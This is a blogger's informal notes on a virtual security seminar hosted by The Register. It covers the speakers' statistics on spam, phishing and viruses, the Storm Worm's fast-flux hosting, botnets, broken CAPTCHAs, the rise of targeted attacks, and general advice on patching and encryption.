The Evolving Security Landscape
I attended the virtual Security Seminar The Evolving Security Landscape today, as brought to us by those nice lads and lasses at The Register.
Slightly disappointingly for a technology seminar, we were specifically instructed to view the seminar with Internet Explorer, as the slides wouldn’t work in Firefox. Bad form, guys. Get this one sorted for next time, eh?
Anyway, I made a series of notes as they were talking which I’ve included here: any errors or inaccuracies are probably my fault through trying to scribble down notes too quickly. I believe the stuff will be available online later, so you can always wait for that, but if you’d like my brief (and approximate) overview of it, read on.
Mark Sunner from MessageLabs kicked us off, talking about their infrastructure, the way and the locations in which they check email, and the way in which the virus concept has changed very much from the ‘teenager in a back bedroom’ to organised criminals using botnets to pump out spam/ viruses and phishing attempts.
The MessageLabs stats he showed us on a slide indicated that:
- 76.8% of email is spam
- 1 in 265 emails is a phishing attempt
- 1 in 170 emails contains a virus
The message was very much that the ‘bad guys’ behind the viruses and phishing attempts are well organised and technically very proficient:
the bad guys are the technical equivalent of their opponents in the security industryMark Sunner (Messagelabs)
…although I’m not sure why they would presume that any IT professionals wouldn’t already know that, but there’s frequently an element of this in this sort of event — there’s too much background: most of the people at a security event (virtual or otherwise) will have some idea of what is going on, what we want are specifics on what is coming…
…but then Mark went on to talk about the Storm Worm (a recent outbreak) and how this utilised a technique known by the anti-virus people as ‘fast flux’ — the malicious payload is downloaded from an internet site, but the location of that site actually changes every 3 minutes. This makes it incredibly difficult to track it down and get it switched off, leading to ‘the bad guys’ referring to it as ‘bulletproof hosting’.
What might not have been so widely known was that the growth in botnets follows very closely to the growth in broadband internet usage — because those infected machines can them pump out spam at a greater rate than they could do on dial-up (plus broadband connections tend to get left ‘on’ more).
…broadband is the air supply that makes botnets workMark Sunner (Messagelabs)
Mark also suggested that CAPTCHAs are now effectively broken. Spam bots can solve a CAPTCHA about 30% of the time — and the other 70% of the time they can just request a new CAPTCHA. CAPTCHAs have traditionally been used to prevent spam bots and blind people from accessing web services, but as it appears now that the only impact they are having is on blind people, there is maybe a need to move away from the traditional visual CAPTCHA?
Maybe a simple maths problem, like this?
Anyway, back to the security thingummy…
Increasingly, viruses being delivered by email are now being delivered by a hyperlink in the email, rather than as an attachment. This means that the email itself is less likely to get blocked, although it does rely on someone following the link to download the malicious payload.
More recently, the in vogue attack is to compromise a legitimate high traffic site in a small way so it is not too obvious, but to then link from that site to the malicious code.
Lots of threats available via email, and via the web, but there are much less threats available via IM because of the ‘walled garden’ approach — different IM networks are only just starting to talk to one another, so currently there is less perceived ‘benefit’ to the virus/trojan writers to target IM as each IM network is relatively small, as opposed to email or the web, where an attack can cover the whole service.
In contrast with this, the incidence of specifically crafted targeted attacks is increasing massively:
- 2005 — 2 targeted attacks/week
- 2006 — 1 targeted attack/day
- 2007 (Jan) — 10 targeted attacks/day
- 2008 (Jun) — 80 targeted attacks/day
These targetted attacks would appear to come from someone they know, would be addressed to the user specifically (full name, often job title), and would references terms and ideas they know because that person (or at least their job) is the specific target of that attack, rather than the standard ’scattergun’ phish attack. These targetted attacks would also come with a specifically-crafted word document constructed to cause a buffer overflow that would launch a trojan.
You can buy a purpose-built trojan, crafted just for you, that comes with a guarantee it will get past desktop protection from certain Eastern European websites…Mark Sunner (MessageLabs)
…and they say craftsmanship is dead!
After that rather gloomy note where we seemed to be in a situation where there was only ever going to be more spam, better viruses and that virus-writers were going to rise from the dead and eat our children (or something…), Mark wrapped up his session and passed over to Jon Collins from Freeform Dynamics.
Jon said that they had posed the question “have risk concerns held you back from taking up any of the following?” and found that quite a proportion have been put off certain things…
- IP telephony — 50%
- access to systems by suppliers/ partners — 45%
- adoption of home working — 37%
When you are considering security, you need to consider things from an integration perspective — security isn’t something that can be easily boxed into many small sectionsm, you need to consider it holistically, for example you may have problems if you have outsourced desktop support but they don’t cover security…
Of course, if you’re having security issues because you don’t have the resources available, the good news is it should get a lot better after your security has been compromised because:
…the easiest time to get funding for security [...] is just after you’ve had a really bad problem.Jon Collins (Freeform Dynamics)
They then looked at answering a few questions from the audience which had been emailed in. Firstly, someone asked about security issues with mobile phones and similar devices…
Mark Sunner responded that while we don’t have a particular problem with SMS spam in this country, it is a much bigger problem in Japan and Korea where the mobile phone networks are more sophisticated, so it is potentially a problem for the future for us here in the UK. Away from the phones and more looking at mobile devices such as the iPhone and similar devices, he indicated that as the device becomes more like a PC (able to access email etc), it becomes more subject to the risks of spam/viruses.
…it’s a bit like the IM thing … at the moment it makes more sense for the bad guys to target email/web rather than [individual mobile phone devices]Jon Collins (Freeform Dynamics)
And, as a final note, Tim Phillips from The Register asked Jon and Mark to recommend something that people should do today and something that they should do in about a month to improve security.
something to do today — update your home computers with all necessary patches. And for next month — in terms of who has the expertise, you need to get the bridge between people who understand technical security risks, and those who understand the business risks, and get that dialogue up and running.Jon Collins (Freeform Dynamics)
– also ensure that any work computers, particularly laptops etc are updated with patches. Look at getting encryption on mobile devices. Next month — get a handle on ‘what do you know about your own traffic’? Do you know how many emails your organisation sends and receives in a working day? What are the patterns of access?Mark Sunner (MessageLabs)
Is there a hole in your browser?
Hello. I am 
